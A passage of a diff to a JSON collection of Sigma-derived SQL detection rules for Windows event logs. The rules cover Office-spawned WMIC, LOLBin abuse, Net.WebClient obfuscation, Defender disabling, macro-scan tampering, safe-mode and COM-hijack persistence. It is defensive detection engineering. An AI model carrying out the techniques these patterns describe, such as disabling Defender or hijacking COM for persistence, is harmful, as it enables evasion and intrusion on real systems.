'%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND NewValue = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (NewValue LIKE '%.zip;%' ESCAPE '\\' OR NewValue LIKE '%.rar;%' ESCAPE '\\' OR NewValue LIKE '%.exe;%' ESCAPE '\\' OR NewValue LIKE '%.bat;%' ESCAPE '\\' OR NewValue LIKE '%.com;%' ESCAPE '\\' OR NewValue LIKE '%.cmd;%' ESCAPE '\\' OR NewValue LIKE '%.reg;%' ESCAPE '\\' OR NewValue LIKE '%.msi;%' ESCAPE '\\' OR NewValue LIKE '%.htm;%' ESCAPE '\\' OR NewValue LIKE '%.html;%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" + "filename": "registry_set_policies_associations_tamper.yml" }, { - "title": "File Download Using Notepad++ GUP Utility", - "id": "44143844-0631-49ab-97a0-96387d6b2d7c", + "title": "Custom File Open Handler Executes PowerShell", + "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the abuse of custom file open handler, executing powershell", + "author": "CD_R0M_", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Other parent processes other than notepad++ using GUP that are not currently identified" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\' AND NewValue LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_gup_download.yml" + "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" }, { - "title": "Wab Execution From Non Default Location", - "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "title": "Registry Persitence via Service in Safe Mode", + "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", "status": "experimental", - "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.execution" + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND NewValue = 'Service') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" + "filename": "registry_set_add_load_service_in_safe_mode.yml" }, { - "title": "Mavinject Inject DLL Into Running Process", - "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "title": "Disable Macro Runtime Scan Scope", + "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", "status": "experimental", - "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" + "filename": "registry_set_disable_macroruntimescanscope.yml" }, { - "title": "Suspicious Microsoft OneNote Child Process", - "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "title": "Windows Defender Service Disabled", + "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", "status": "experimental", - "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", + "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "File located in the AppData folder with trusted signature" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND NewValue = 'DWORD (0x00000004)')" ], - "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" + "filename": "registry_set_disable_windows_defender_service.yml" }, { - "title": "Net WebClient Casing Anomalies", - "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", - "status": "experimental", - "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", + "title": "Suspicious Printer Driver Empty Manufacturer", + "id": "e0813366-0407-449a-9869-a2db1119dc41", + "status": "test", + "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Unknown" + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND NewValue = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_webclient_casing.yml" + "filename": "registry_set_susp_printer_driver.yml" }, { - "title": "Suspicious SYSTEM User Process Creation", - "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", - "status": "test", - "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", - "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", + "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", + "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "status": "experimental", + "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.015" + ], "falsepositives": [ - "Administrative activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Probable legitimate applications. If you find these please add them to an exclusion list" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName 